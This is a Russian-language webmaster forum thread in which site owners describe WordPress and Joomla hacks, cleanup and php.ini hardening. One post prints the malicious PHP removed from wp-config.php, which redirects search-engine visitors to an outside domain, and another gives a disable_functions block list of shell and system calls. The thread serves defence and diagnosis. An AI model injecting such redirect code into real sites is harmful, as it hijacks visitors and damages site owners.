- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Stolz, примерчик того, какие функции блокируете в php.ini не выложите?:)
с аналогичными признаками в начале месяца этого были взломаны сайты на WP. Вирусняк вначале создавал файлы вида w1234567w.php в корне сайтов, затем прописывал по всем *.php свой код в начале, как писал ТС. Следующим шагом была подмена .htaccess с редиректом и на все папки 777. Спасибо хостерам - все почистили.
поэтому, проследите дальше, не будет ли подмена файлов.
поставил плагин, который отслеживает активность на сайте и вижу, что ежедневно идет атака с кодом eval(base64.....) с IP 31.*.*.* (разный дальше)
facegrodno, а как плагин называется?
mute screamer
Да говоря по правде у меня четыре jooml'ы полетели 1.5.25 в том числе, при чем на 3ех разных хост площадках. 2 из которых практически новых сайта! и кроме меня о них ни кто не знал.
А вот с этим уже интересно, как думаете может к хостингу обратится?
P.S. Огромное спасибо за помощь! Уже трижды поверил комп на вирусы, сейчас буду привдить сайты в порядок :)
Не просто обьратиться, а бить в живот ногами. Это чистейший прощелк админов. Так как на большинстве хостнгов обновляют софт только тогда, когда уже просто их сервера сносят хакеры после установки через незакрытые дыры или когда клиенты криком кричат из-за неподдерживаемых НУЖНЫХ им функций в старом софте. В целом многие хостинги работают по принципу "заплатил - свободен". Потеряв 7 серверов, после "внезапного пожара" в ХостингЮА (Одесса) я принял категорическое решение. Все что приносит деньги выносить за пределы СНГ. И ни разу не пожалел. А Вы уж многоуважаемые принимайте решение сами , что Вам делать.
Так сайты почистил - удалил этот код и вуаля больше ни каких проблем, очень помогла программа @Text Replacer - очистила весь код за 1-2 минуты. Установил права не изменять файлы - и вроде все нормально. Поисковики больше не жалуются.
Подозрений какой плагин, модуль или компонент мог это сделать у меня нет. Насчет паролей - вобще ни где не храню - помню наизусть.
Stolz, примерчик того, какие функции блокируете в php.ini не выложите?:)
disable_functions="popen, exec, system, passthru, proc_open, shell_exec, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, base64_decode, disk_free_space, diskfreespace, dl, highlight_file, ini_alter, ini_restore, openlog, passthru, phpinfo, proc_nice, shell_exec, show_source, symlink, define_syslog_variables, escapeshellarg, escapeshellcmd,ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file,posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname"
В завимости от сайтов и задач этот список может варьироваться. Когда настраиваете VDS или сервер просто вбиваете все по максимуму, а затем наблюдать - при включенном выводе ошибок система сообщит, что та или иная функция запрещена.
Сам сегодня пострадал от сабжа:
вот такой код выполнялся
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://happynewyear.osa.pl/");
exit();
}
}
}
}
Вырезал заразу из файла wp-config.php. У кого-то есть данные, каким способом заливалось, или гадать только на кофейной гуще пока можно?
Сам сегодня пострадал от сабжа:
вот такой код выполнялся
Вырезал заразу из файла wp-config.php. У кого-то есть данные, каким способом заливалось, или гадать только на кофейной гуще пока можно?
Ну чисто гипотетически, есть такое предположение: какой-то "добрый seoшник" и в любом случаи талантливый человек написал скрипт, который при активации открывает все текстовые файлы, находит строку "<?php " и меняет ее на нужный ему текст. А заливался этот скрипт, возможно, самостоятельно, допустим автор скрипта втащил его в какой-нибудь популярный плагин или модуль, дописал строчку активации скрипта и выложил в интернет. И при установки вуаля все новые сайты будут ссылаться на него. Профилактика: права 555 на все файлы.
и я заметил такую особенность после удаления строк с вредным кодом, даже если права 777, на следующий день код не появляется, возможно данный скрипт запускается один раз.
Работоспособность того же вордпресса например не обвалится от такого?
Профилактика: права 555 на все файлы.